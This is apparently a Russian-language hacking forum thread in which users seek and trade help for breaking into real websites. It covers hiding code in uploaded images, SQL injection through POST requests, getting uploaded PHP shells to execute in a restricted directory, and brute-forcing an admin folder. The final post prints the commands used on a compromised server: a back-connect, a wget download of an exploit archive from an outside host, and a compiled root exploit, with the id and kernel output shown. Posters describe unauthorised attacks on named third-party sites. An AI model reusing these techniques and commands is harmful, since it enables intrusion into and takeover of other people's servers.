Я повторю свои вопросы более конкретно. Хотелось бы услышать ясный и чёткий ответ, если ты действительно понимаешь зачем это делать, а не просто тупо прочитал где-то (я даже знаю где) и теперь не задумываясь постишь это тут. Вопросы: Зачем я должен проделывать такие вещи с хекс эдитором? Что КОНКРЕТНО это даёт? Почему нужно менять именно эти байты? Как это поможет при заливке картинки и что изменится если я этого делать не буду, а просто впихну код в конец никак не заморачиваясь с этими чудесами, или в метаданные, с которыми, кстати, заморачиваться не нужно, это элементарная операция? Какую проверку это позволит обойти, из тех, что невозможно обойти предложенными мной вариантами?
Как проводить sql inj через POST.Когда в одно из полей вставляю кавычку вылазит ошибка-1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 Соответственно скуля есть,а вот как раскрутить хз.Помогите пожалуста.
пиши все тоже самое что и в GET запросе но тока в то поле вот тебе и будет POST запрос или в лисе перехвати запрос и поменяй его
Такой вопрос, всю голову сломал уже... Нашел инъект, раскрутил, нашел пароль от админки, через админку можно заливать файлы с любым расширением, НО, php не выполняются, хтмл/гиф - отображаются корректно, а php - предлагается скачать файл при обращении, пробовал залить .htaccess в эту диру через админку - залилось вроде, проставил в нем выполнение html как php, бесполезно, что можно сделать?
вполне возможно что там не апач а скажем nginx или их комбинация. Если это так то попытайся поискать дополнительную информацию в конфигах веб-сервера
Нет у меня доступа ни к другим дирам, ни к чему вообще, только формочка в админке с выбором файла (изображение для постинга новостей, не фильтрует расширение). Можно ли как-то заставить сервер выполнять php скрипты в этой дире? Хтмл, яваскрипт, все пашет, пхп - нет, заливка .htaccess не помогает как я понял. Других вариантов кроме шелла через админку - нет, даже не предлагайте.
"Попробуй залить с расширением phtml или phps." Пробовал phtml - бесполезно, отображает содержимое скрипта, не воспринимает на исполнение в отличии от php, который воспринимается как скрипт-приложение.
Суть в том, что видимо в этом каталоге запрещено выполнение php-скриптов, заливка своего .htaccess не помогает видимо, пробовал разрешить выполнение .html, phtml и .jpg как php-скрипт - не катит, есть варианты?
можно ли вместе с запросом типа "SELECT * FROM news WHERE id=g_ID", где g_ID не фильтрованное значение $_GET['id'] использовать запросы UPDATE или INSERT ?
всем привет! При обращении к скрипту (бeз параметров) вылетает куча таких ошибок, можно ли это как нибудь раскрутить?
Почему нельзя Если попробовать манипуляции со скриптом, могут появится различные дополнительные ошибки
Ну и толку? Раскрытие путей уже получили, но конекта то с БД нет .. конкретно с его скрипта доп-но ничего не выжать, учитывая ту информацию, что он предоставил в этой ветке.
такая проблема ,есть сайт надо найти админку, site/admin/ 403 форбайден. мне надо найди файлы в папке site/admin/,если ли софт для брута файлов? можно канешно сгенирить списки,и прочекать линки ,но это на случай что спец софта нету
Если в .htaccess на все файлы стоит Forbidden, то никак. Есть вопрос по руту сервака. Делаю back-коннект к себе. Комманды: Code: cd /tmp wget http://evilcode.hmarka.net/2.tgz gcc run.c -O run ./run padlina z lublina! //это выводит после запуска id Code: uid=48(apache) gid=48(apache) groups=48(apache),503(nismo),504([email protected]),505(shopua555),506(kamar),507(geniewgen) Т.е. сервак не порутался... Как его порутать? Есть ли сплоит какой? Code: Linux shopua.com.ua 2.6.26.8-57.fc8 #1 SMP Thu Dec 18 19:19:45 EST 2008 i686 athlon i386 GNU/Linux
